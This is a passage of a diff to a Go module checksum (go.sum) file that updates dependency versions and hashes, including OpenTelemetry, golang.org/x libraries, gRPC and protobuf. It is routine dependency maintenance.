+github.com/spf13/cobra v1.10.2 h1:DMTTonx5m65Ic0GOoRY2c16WCbHxOOw6xxezuLaBpcU=
+github.com/spf13/cobra v1.10.2/go.mod h1:7C1pvHqHw5A4vrJfjNwvOdzYu0Gml16OCs2GRiTUUS4=
github.com/spf13/pflag v1.0.9/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
github.com/spf13/pflag v1.0.10 h1:4EBh2KAYBwaONj6b2Ye1GiHfwjqyROoF4RwYO+vPwFk=
github.com/spf13/pflag v1.0.10/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
@@ -591,17 +587,17 @@ github.com/subosito/gotenv v1.6.0 h1:9NlTDc1FTs4qu0DDq7AEtTPNw6SVm7uBMsUCUjABIf8
github.com/subosito/gotenv v1.6.0/go.mod h1:Dk4QP5c2W3ibzajGcXpNraDfq2IrhjMIvMSWPKKo0FU=
github.com/tchap/go-patricia/v2 v2.3.3 h1:xfNEsODumaEcCcY3gI0hYPZ/PcpVv5ju6RMAhgwZDDc=
github.com/tchap/go-patricia/v2 v2.3.3/go.mod h1:VZRHKAb53DLaG+nA9EaYYiaEx6YztwDlLElMsnSHD4k=
-github.com/tklauser/go-sysconf v0.3.15 h1:VE89k0criAymJ/Os65CSn1IXaol+1wrsFHEB8Ol49K4=
-github.com/tklauser/go-sysconf v0.3.15/go.mod h1:Dmjwr6tYFIseJw7a3dRLJfsHAMXZ3nEnL/aZY+0IuI4=
-github.com/tklauser/numcpus v0.10.0 h1:18njr6LDBk1zuna922MgdjQuJFjrdppsZG60sHGfjso=
-github.com/tklauser/numcpus v0.10.0/go.mod h1:BiTKazU708GQTYF4mB+cmlpT2Is1gLk7XVuEeem8LsQ=
+github.com/tklauser/go-sysconf v0.3.16 h1:frioLaCQSsF5Cy1jgRBrzr6t502KIIwQ0MArYICU0nA=
+github.com/tklauser/go-sysconf v0.3.16/go.mod h1:/qNL9xxDhc7tx3HSRsLWNnuzbVfh3e7gh/BmM179nYI=
+github.com/tklauser/numcpus v0.11.0 h1:nSTwhKH5e1dMNsCdVBukSZrURJRoHbSEQjdEbY+9RXw=
+github.com/tklauser/numcpus v0.11.0/go.mod h1:z+LwcLq54uWZTX0u/bGobaV34u6V7KNlTZejzM6/3MQ=
github.com/tv42/httpunix v0.0.0-20150427012821-b75d8614f926/go.mod h1:9ESjWnEqriFuLhtthL60Sar/7RFoluCcXsuvEwTV5KM=
github.com/uptrace/opentelemetry-go-extra/otelutil v0.3.2 h1:3/aHKUq7qaFMWxyQV0W2ryNgg8x8rVeKVA20KJUkfS0=
github.com/uptrace/opentelemetry-go-extra/otelutil v0.3.2/go.mod h1:Zit4b8AQXaXvA68+nzmbyDzqiyFRISyw1JiD5JqUBjw=
github.com/uptrace/opentelemetry-go-extra/otelzap v0.3.2 h1:cj/Z6FKTTYBnstI0Lni9PA+k2foounKIPUmj1LBwNiQ=
github.com/uptrace/opentelemetry-go-extra/otelzap v0.3.2/go.mod h1:LDaXk90gKEC2nC7JH3Lpnhfu+2V7o/TsqomJJmqA39o=
-github.com/valyala/fastjson v1.6.4 h1:uAUNq9Z6ymTgGhcm0UynUAB6tlbakBrz6CQFax3BXVQ=
-github.com/valyala/fastjson v1.6.4/go.mod h1:CLCAqky6SMuOcxStkYQvblddUtoRxhYMGLrsQns1aXY=
+github.com/valyala/fastjson v1.6.7 h1:ZE4tRy0CIkh+qDc5McjatheGX2czdn8slQjomexVpBM=
+github.com/valyala/fastjson v1.6.7/go.mod h1:CLCAqky6SMuOcxStkYQvblddUtoRxhYMGLrsQns1aXY=
github.com/vektah/gqlparser/v2 v2.5.31 h1:YhWGA1mfTjID7qJhd1+Vxhpk5HTgydrGU9IgkWBTJ7k=
github.com/vektah/gqlparser/v2 v2.5.31/go.mod h1:c1I28gSOVNzlfc4WuDlqU7voQnsqI6OG2amkBAFmgts=
github.com/xanzy/ssh-agent v0.3.3 h1:+/15pJfg/RsTxqYcX6fHqOXZwwMP+2VyYWJeWM2qQFM=
@@ -618,42 +614,44 @@ github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9de
github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
github.com/yusufpapurcu/wmi v1.2.4 h1:zFUKzehAFReQwLys1b/iSMl+JQGSCSjtVqQn9bBrPo0=
github.com/yusufpapurcu/wmi v1.2.4/go.mod h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0=
-github.com/zclconf/go-cty v1.17.0 h1:seZvECve6XX4tmnvRzWtJNHdscMtYEx5R7bnnVyd/d0=
-github.com/zclconf/go-cty v1.17.0/go.mod h1:wqFzcImaLTI6A5HfsRwB0nj5n0MRZFwmey8YoFPPs3U=
+github.com/zclconf/go-cty v1.18.0 h1:pJ8+HNI4gFoyRNqVE37wWbJWVw43BZczFo7KUoRczaA=
+github.com/zclconf/go-cty v1.18.0/go.mod h1:qpnV6EDNgC1sns/AleL1fvatHw72j+S+nS+MJ+T2CSg=
github.com/zclconf/go-cty-debug v0.0.0-20240509010212-0d6042c53940 h1:4r45xpDWB6ZMSMNJFMOjqrGHynW3DIBuR2H9j0ug+Mo=
github.com/zclconf/go-cty-debug v0.0.0-20240509010212-0d6042c53940/go.mod h1:CmBdvvj3nqzfzJ6nTCIwDTPZ56aVGvDrmztiO5g3qrM=
+github.com/zeebo/xxh3 v1.0.2 h1:xZmwmqxHZA8AI603jOQ0tMqmBr9lPeFwGg6d+xy9DC0=
+github.com/zeebo/xxh3 v1.0.2/go.mod h1:5NWz9Sef7zIDm2JHfFlcQvNekmcEl9ekUZQQKCYaDcA=
go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64=
go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y=
-go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.63.0 h1:RbKq8BG0FI8OiXhBfcRtqqHcZcka+gU3cskNuf05R18=
-go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.63.0/go.mod h1:h06DGIukJOevXaj/xrNjhi/2098RZzcLTbc0jDAUbsg=
-go.opentelemetry.io/otel v1.38.0 h1:RkfdswUDRimDg0m2Az18RKOsnI8UDzppJAtj01/Ymk8=
-go.opentelemetry.io/otel v1.38.0/go.mod h1:zcmtmQ1+YmQM9wrNsTGV/q/uyusom3P8RxwExxkZhjM=
-go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.38.0 h1:GqRJVj7UmLjCVyVJ3ZFLdPRmhDUp2zFmQe3RHIOsw24=
-go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.38.0/go.mod h1:ri3aaHSmCTVYu2AWv44YMauwAQc0aqI9gHKIcSbI1pU=
-go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc v1.38.0 h1:lwI4Dc5leUqENgGuQImwLo4WnuXFPetmPpkLi2IrX54=
-go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc v1.38.0/go.mod h1:Kz/oCE7z5wuyhPxsXDuaPteSWqjSBD5YaSdbxZYGbGk=
-go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.38.0 h1:aTL7F04bJHUlztTsNGJ2l+6he8c+y/b//eR0jjjemT4=
-go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.38.0/go.mod h1:kldtb7jDTeol0l3ewcmd8SDvx3EmIE7lyvqbasU3QC4=
-go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.38.0 h1:kJxSDN4SgWWTjG/hPp3O7LCGLcHXFlvS2/FFOrwL+SE=
-go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.38.0/go.mod h1:mgIOzS7iZeKJdeB8/NYHrJ48fdGc71Llo5bJ1J4DWUE=
+go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.65.0 h1:7iP2uCb7sGddAr30RRS6xjKy7AZ2JtTOPA3oolgVSw8=
+go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.65.0/go.mod h1:c7hN3ddxs/z6q9xwvfLPk+UHlWRQyaeR1LdgfL/66l0=
+go.opentelemetry.io/otel v1.40.0 h1:oA5YeOcpRTXq6NN7frwmwFR0Cn3RhTVZvXsP4duvCms=
+go.opentelemetry.io/otel v1.40.0/go.mod h1:IMb+uXZUKkMXdPddhwAHm6UfOwJyh4ct1ybIlV14J0g=
+go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.40.0 h1:QKdN8ly8zEMrByybbQgv8cWBcdAarwmIPZ6FThrWXJs=
+go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.40.0/go.mod h1:bTdK1nhqF76qiPoCCdyFIV+N/sRHYXYCTQc+3VCi3MI=
+go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.40.0 h1:wVZXIWjQSeSmMoxF74LzAnpVQOAFDo3pPji9Y4SOFKc=
+go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.40.0/go.mod h1:khvBS2IggMFNwZK/6lEeHg/W57h/IX6J4URh57fuI40=
+go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.40.0 h1:MzfofMZN8ulNqobCmCAVbqVL5syHw+eB2qPRkCMA/fQ=
+go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.40.0/go.mod h1:E73G9UFtKRXrxhBsHtG00TB5WxX57lpsQzogDkqBTz8=
go.opentelemetry.io/otel/log v0.14.0 h1:2rzJ+pOAZ8qmZ3DDHg73NEKzSZkhkGIua9gXtxNGgrM=
go.opentelemetry.io/otel/log v0.14.0/go.mod h1:5jRG92fEAgx0SU/vFPxmJvhIuDU9E1SUnEQrMlJpOno=
-go.opentelemetry.io/otel/metric v1.38.0 h1:Kl6lzIYGAh5M159u9NgiRkmoMKjvbsKtYRwgfrA6WpA=
-go.opentelemetry.io/otel/metric v1.38.0/go.mod h1:kB5n/QoRM8YwmUahxvI3bO34eVtQf2i4utNVLr9gEmI=
-go.opentelemetry.io/otel/sdk v1.38.0 h1:l48sr5YbNf2hpCUj/FoGhW9yDkl+Ma+LrVl8qaM5b+E=
-go.opentelemetry.io/otel/sdk v1.38.0/go.mod h1:ghmNdGlVemJI3+ZB5iDEuk4bWA3GkTpW+DOoZMYBVVg=
-go.opentelemetry.io/otel/sdk/metric v1.38.0 h1:aSH66iL0aZqo//xXzQLYozmWrXxyFkBJ6qT5wthqPoM=
-go.opentelemetry.io/otel/sdk/metric v1.38.0/go.mod h1:dg9PBnW9XdQ1Hd6ZnRz689CbtrUp0wMMs9iPcgT9EZA=
-go.opentelemetry.io/otel/trace v1.38.0 h1:Fxk5bKrDZJUH+AMyyIXGcFAPah0oRcT+LuNtJrmcNLE=
-go.opentelemetry.io/otel/trace v1.38.0/go.mod h1:j1P9ivuFsTceSWe1oY+EeW3sc+Pp42sO++GHkg4wwhs=
-go.opentelemetry.io/proto/otlp v1.7.1 h1:gTOMpGDb0WTBOP8JaO72iL3auEZhVmAQg4ipjOVAtj4=
-go.opentelemetry.io/proto/otlp v1.7.1/go.mod h1:b2rVh6rfI/s2pHWNlB7ILJcRALpcNDzKhACevjI+ZnE=
+go.opentelemetry.io/otel/metric v1.40.0 h1:rcZe317KPftE2rstWIBitCdVp89A2HqjkxR3c11+p9g=
+go.opentelemetry.io/otel/metric v1.40.0/go.mod h1:ib/crwQH7N3r5kfiBZQbwrTge743UDc7DTFVZrrXnqc=
+go.opentelemetry.io/otel/sdk v1.40.0 h1:KHW/jUzgo6wsPh9At46+h4upjtccTmuZCFAc9OJ71f8=
+go.opentelemetry.io/otel/sdk v1.40.0/go.mod h1:Ph7EFdYvxq72Y8Li9q8KebuYUr2KoeyHx0DRMKrYBUE=
+go.opentelemetry.io/otel/sdk/metric v1.40.0 h1:mtmdVqgQkeRxHgRv4qhyJduP3fYJRMX4AtAlbuWdCYw=
+go.opentelemetry.io/otel/sdk/metric v1.40.0/go.mod h1:4Z2bGMf0KSK3uRjlczMOeMhKU2rhUqdWNoKcYrtcBPg=
+go.opentelemetry.io/otel/trace v1.40.0 h1:WA4etStDttCSYuhwvEa8OP8I5EWu24lkOzp+ZYblVjw=
+go.opentelemetry.io/otel/trace v1.40.0/go.mod h1:zeAhriXecNGP/s2SEG3+Y8X9ujcJOTqQ5RgdEJcawiA=
+go.opentelemetry.io/proto/otlp v1.9.0 h1:l706jCMITVouPOqEnii2fIAuO3IVGBRPV5ICjceRb/A=
+go.opentelemetry.io/proto/otlp v1.9.0/go.mod h1:xE+Cx5E/eEHw+ISFkwPLwCZefwVjY+pqKg1qcK03+/4=
+go.uber.org/atomic v1.11.0 h1:ZvwS0R+56ePWxUNi+Atn9dWONBPp/AUETXlHW0DxSjE=
+go.uber.org/atomic v1.11.0/go.mod h1:LUxbIzbOniOlMKjJjyPfpl4v+PKK2cNJn91OQbhoJI0=
go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto=
go.uber.org/goleak v1.3.0/go.mod h1:CoHD4mav9JJNrW/WLlf7HGZPjdw8EucARQHekz1X6bE=
go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0=
go.uber.org/multierr v1.11.0/go.mod h1:20+QtiLqy0Nd6FdQB9TLXag12DsQkrbs3htMFfDN80Y=
-go.uber.org/zap v1.27.0 h1:aJMhYGrd5QSmlpLMr2MftRKl7t8J8PTZPA732ud/XR8=
-go.uber.org/zap v1.27.0/go.mod h1:GB2qFLM7cTU87MWRP2mPIjqfIDnGu+VIO4V/SdhGo2E=
+go.uber.org/zap v1.27.1 h1:08RqriUEv8+ArZRYSTXy1LeBScaMpVSTBhCeaZYfMYc=
+go.uber.org/zap v1.27.1/go.mod h1:GB2qFLM7cTU87MWRP2mPIjqfIDnGu+VIO4V/SdhGo2E=
go.yaml.in/yaml/v2 v2.4.3 h1:6gvOSjQoTB3vt1l+CU+tSyi/HOjfOjRLJ4YwYZGwRO0=
go.yaml.in/yaml/v2 v2.4.3/go.mod h1:zSxWcmIDjOzPXpjlTTbAsKokqkDNAVtZO0WOMiT90s8=
go.yaml.in/yaml/v3 v3.0.4 h1:tfq32ie2Jv2UxXFdLJdh3jXuOzWiL1fo0bu/FbuKpbc=
@@ -664,14 +662,14 @@ golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8U
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a/go.mod h1:P+XmwS30IXTQdn5tA2iutPOUgjI07+tq3H3K9MVA1s8=
golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4=
-golang.org/x/crypto v0.43.0 h1:dduJYIi3A3KOfdGOHX8AVZ/jGiyPa3IbBozJ5kNuE04=
-golang.org/x/crypto v0.43.0/go.mod h1:BFbav4mRNlXJL4wNeejLpWxB7wMbc79PdRGhWKncxR0=
+golang.org/x/crypto v0.48.0 h1:/VRzVqiRSggnhY7gNRxPauEQ5Drw9haKdM0jqfcCFts=
+golang.org/x/crypto v0.48.0/go.mod h1:r0kV5h3qnFPlQnBSrULhlsRfryS2pmewsg+XfMgkVos=
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546 h1:mgKeJMpvi0yx/sU5GsxQ7p6s2wtOnGAHZWCHUM4KGzY=
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546/go.mod h1:j/pmGrbnkbPtQfxEe5D0VQhZC6qKbfKifgD0oM7sR70=
golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
-golang.org/x/mod v0.29.0 h1:HV8lRxZC4l2cr3Zq1LvtOsi/ThTgWnUk/y64QSs8GwA=
-golang.org/x/mod v0.29.0/go.mod h1:NyhrlYXJ2H4eJiRy/WDBO6HMqZQ6q9nk4JzS3NuCK+w=
+golang.org/x/mod v0.32.0 h1:9F4d3PHLljb6x//jOyokMv3eX+YDeepZSEo3mFJy93c=
+golang.org/x/mod v0.32.0/go.mod h1:SgipZ/3h2Ci89DlEtEXWUk/HteuRin+HHhN+WbNhguU=
golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
golang.org/x/net v0.0.0-20181114220301-adae6a3d119a/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
@@ -683,8 +681,8 @@ golang.org/x/net v0.0.0-20200625001655-4c5254603344/go.mod h1:/O7V0waA8r7cgGh81R
golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
-golang.org/x/net v0.46.0 h1:giFlY12I07fugqwPuWJi68oOnpfqFnJIJzaIIm2JVV4=
-golang.org/x/net v0.46.0/go.mod h1:Q9BGdFy1y4nkUwiLvT5qtyhAnEHgnQ/zd8PfU6nc210=
+golang.org/x/net v0.50.0 h1:ucWh9eiCGyDR3vtzso0WMQinm2Dnt8cFMuQa9K33J60=
+golang.org/x/net v0.50.0/go.mod h1:UgoSli3F/pBgdJBHCTc+tp3gmrU4XswgGRgtnwWTfyM=
golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
golang.org/x/oauth2 v0.32.0 h1:jsCblLleRMDrxMN29H3z/k1KliIvpLgCkE6R8FXXNgY=
golang.org/x/oauth2 v0.32.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA=
@@ -694,8 +692,8 @@ golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJ
golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20201207232520-09787c993a3a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
-golang.org/x/sync v0.17.0 h1:l60nONMj9l5drqw6jlhIELNv9I0A4OFgRsG9k2oT9Ug=
-golang.org/x/sync v0.17.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
+golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4=
+golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
golang.org/x/sys v0.0.0-20180905080454-ebe1bf3edb33/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20181116152217-5ac8a444bdc5/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
@@ -725,36 +723,36 @@ golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8/go.mod h1:oPkhp1MJrh7nUepCBc
golang.org/x/sys v0.0.0-20220817070843-5a390386f1f2/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.1.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
-golang.org/x/sys v0.37.0 h1:fdNQudmxPjkdUTPnLn5mdQv7Zwvbvpaxqs831goi9kQ=
-golang.org/x/sys v0.37.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
+golang.org/x/sys v0.41.0 h1:Ivj+2Cp/ylzLiEU89QhWblYnOE9zerudt9Ftecq2C6k=
+golang.org/x/sys v0.41.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
-golang.org/x/term v0.36.0 h1:zMPR+aF8gfksFprF/Nc/rd1wRS1EI6nDBGyWAvDzx2Q=
-golang.org/x/term v0.36.0/go.mod h1:Qu394IJq6V6dCBRgwqshf3mPF85AqzYEzofzRdZkWss=
+golang.org/x/term v0.40.0 h1:36e4zGLqU4yhjlmxEaagx2KuYbJq3EwY8K943ZsHcvg=
+golang.org/x/term v0.40.0/go.mod h1:w2P8uVp06p2iyKKuvXIm7N/y0UCRt3UfJTfZ7oOpglM=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
-golang.org/x/text v0.30.0 h1:yznKA/E9zq54KzlzBEAWn1NXSQ8DIp/NYMy88xJjl4k=
-golang.org/x/text v0.30.0/go.mod h1:yDdHFIX9t+tORqspjENWgzaCVXgk0yYnYuSZ8UzzBVM=
+golang.org/x/text v0.34.0 h1:oL/Qq0Kdaqxa1KbNeMKwQq0reLCCaFtqu2eNuSeNHbk=
+golang.org/x/text v0.34.0/go.mod h1:homfLqTYRFyVYemLBFl5GgL/DWEiH5wcsQ5gSh1yziA=
golang.org/x/time v0.14.0 h1:MRx4UaLrDotUKUdCIqzPC48t1Y9hANFKIRpNx+Te8PI=
golang.org/x/time v0.14.0/go.mod h1:eL/Oa2bBBK0TkX57Fyni+NgnyQQN4LitPmob2Hjnqw4=
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
-golang.org/x/tools v0.38.0 h1:Hx2Xv8hISq8Lm16jvBZ2VQf+RLmbd7wVUsALibYI/IQ=
-golang.org/x/tools v0.38.0/go.mod h1:yEsQ/d/YK8cjh0L6rZlY8tgtlKiBNTL14pGDJPJpYQs=
+golang.org/x/tools v0.41.0 h1:a9b8iMweWG+S0OBnlU36rzLp20z1Rp10w+IY2czHTQc=
+golang.org/x/tools v0.41.0/go.mod h1:XSY6eDqxVNiYgezAVqqCeihT4j1U2CCsqvH3WhQpnlg=
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4=
-google.golang.org/genproto/googleapis/api v0.0.0-20251022142026-3a174f9686a8 h1:mepRgnBZa07I4TRuomDE4sTIYieg/osKmzIf4USdWS4=
-google.golang.org/genproto/googleapis/api v0.0.0-20251022142026-3a174f9686a8/go.mod h1:fDMmzKV90WSg1NbozdqrE64fkuTv6mlq2zxo9ad+3yo=
-google.golang.org/genproto/googleapis/rpc v0.0.0-20251022142026-3a174f9686a8 h1:M1rk8KBnUsBDg1oPGHNCxG4vc1f49epmTO7xscSajMk=
-google.golang.org/genproto/googleapis/rpc v0.0.0-20251022142026-3a174f9686a8/go.mod h1:7i2o+ce6H/6BluujYR+kqX3GKH+dChPTQU19wjRPiGk=
-google.golang.org/grpc v1.75.1 h1:/ODCNEuf9VghjgO3rqLcfg8fiOP0nSluljWFlDxELLI=
-google.golang.org/grpc v1.75.1/go.mod h1:JtPAzKiq4v1xcAB2hydNlWI2RnF85XXcV0mhKXr2ecQ=
+google.golang.org/genproto/googleapis/api v0.0.0-20260128011058-8636f8732409 h1:merA0rdPeUV3YIIfHHcH4qBkiQAc1nfCKSI7lB4cV2M=
+google.golang.org/genproto/googleapis/api v0.0.0-20260128011058-8636f8732409/go.mod h1:fl8J1IvUjCilwZzQowmw2b7HQB2eAuYBabMXzWurF+I=
+google.golang.org/genproto/googleapis/rpc v0.0.0-20260128011058-8636f8732409 h1:H86B94AW+VfJWDqFeEbBPhEtHzJwJfTbgE2lZa54ZAQ=
+google.golang.org/genproto/googleapis/rpc v0.0.0-20260128011058-8636f8732409/go.mod h1:j9x/tPzZkyxcgEFkiKEEGxfvyumM01BEtsW8xzOahRQ=
+google.golang.org/grpc v1.79.1 h1:zGhSi45ODB9/p3VAawt9a+O/MULLl9dpizzNNpq7flY=
+google.golang.org/grpc v1.79.1/go.mod h1:KmT0Kjez+0dde/v2j9vzwoAScgEPx/Bw1CYChhHLrHQ=
google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8=
google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0=
google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM=
@@ -762,8 +760,8 @@ google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miE
google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo=
google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
-google.golang.org/protobuf v1.36.10 h1:AYd7cD/uASjIL6Q9LiTjz8JLcrh/88q5UObnmY3aOOE=
-google.golang.org/protobuf v1.36.10/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco=
+google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE=
+google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco=
gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
@@ -786,8 +784,8 @@ gorm.io/gorm v1.31.1 h1:7CA8FTFz/gRfgqgpeKIBcervUn3xSyPUmr6B2WXJ7kg=
gorm.io/gorm v1.31.1/go.mod h1:XyQVbO2k6YkOis7C2437jSit3SsDK72s7n7rsSHd+Gs=
